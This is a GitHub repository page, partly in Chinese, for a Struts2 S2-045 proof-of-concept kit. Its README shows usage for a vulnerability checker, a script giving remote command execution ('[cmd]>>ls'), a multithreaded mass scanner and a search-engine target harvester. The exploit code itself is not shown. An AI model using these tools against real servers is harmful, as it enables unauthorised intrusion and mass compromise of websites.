Struts2-045 POC
Python
Switch branches/tags
Nothing to show
Clone or download
Latest commit a252b34 Mar 8, 2017
Permalink
Failed to load latest commit information.
Search_S2_045 update Mar 8, 2017
.gitignore update Mar 7, 2017
README.md Update README.md Mar 8, 2017
s2-045.py update Mar 8, 2017
s2_045_cmd.py update Mar 8, 2017
s2_045_thread.py update Mar 8, 2017
tmp.txt update Mar 7, 2017

README.md

Usage

检测漏洞POC

python s2_045.py http://xxx.com/a.action

>python s2_045.py http://xxx.com/a.action
[Loopholes exist] http://xxx.com/a.action

漏洞利用POC(cmd版)

python s2_045_cmd.py http://xxx.com/a.action

>python s2_045_cmd.py http://xxx.com/a.action
[Loopholes exist] http://xxx.com/a.action
[cmd]>>ls
......

多线程批量检测脚本

python S2_045_thread.py(填写url.txt后运行)

填写url.txt文件,每行一个url地址(url中含.action/.do的地址),运行完以后会生成一个result.txt文件存放存在漏洞的url

利用搜索引擎批量检测脚本

想要采集网站中带.action/.do地址的,请看:Search_S2_045

更多请参考博客:nMask